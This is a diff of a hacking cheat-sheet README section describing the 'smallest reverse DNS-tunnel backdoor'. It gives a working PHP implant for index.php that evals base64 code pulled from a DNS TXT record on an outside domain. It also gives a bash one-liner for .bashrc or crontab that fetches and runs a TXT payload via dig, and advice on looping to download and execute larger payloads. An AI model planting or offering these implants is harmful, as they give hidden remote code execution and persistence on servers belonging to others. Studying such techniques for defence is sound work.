hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 <a id="reverse-dns-backdoor"></a>
 **6.v.
 Smallest reverse DNS-tunnel Backdoor**

-Method to get access to a Web-Server that is not accessible from the public Internet.
-The backdoor uses DNS-TUNNELING to execute an arbitrary command on the Web-Server.
+Execute arbitrary commands on a server that is _not_ accessible from the public Internet by using a reverse DNS trigger.

 Add this implant to an index.php file (example):
 ```php
 <?PHP eval(base64_decode(dns_get_record("b00m.team-teso.net", DNS_TXT)[0]['txt'])); ?>
 ```

-The payload is stored in a DNS TXT record under `b00m.team-teso.net`.
-When triggered, it creates `/tmp/.b00m` and notifies THC (via an app.interactsh.com callback). *Please* create your own payload like so:
+The payload is stored in a DNS TXT record under the domain `b00m.team-teso.net`.
+When triggered, it creates `/tmp/.b00m` and notifies THC (via an app.interactsh.com callback). *Please* use your own domain and also create your own payload.
+Example:
 ```shell
 echo -n '@system("{ id; date;}>/tmp/.b00m 2>/dev/null");' |base64 -w0
 ```
-...and use your own domain (_not_ b00m.team-teso.net).

 - The TXT payload is limited to 2,048 characters (sometimes 65,535 characters).
 - It is a `bootloader` implant.
-Use a while loop to download larger implants via DNS.
+Use a while loop to download and execute larger paypload via DNS.

-Works for `Bash` as well.
-Adding this to `crontab` or `~/.bashrc` yields similar results:
+Can also be triggered via `~/.bashrc` or the user's crontab.
+Use (example):
 ```shell
 bash -c 'exec bash -c "{ $(sed s/\"//g <(dig +short b00m2.team-teso.net TXT)|base64 -d);}"'&>/dev/null
 ```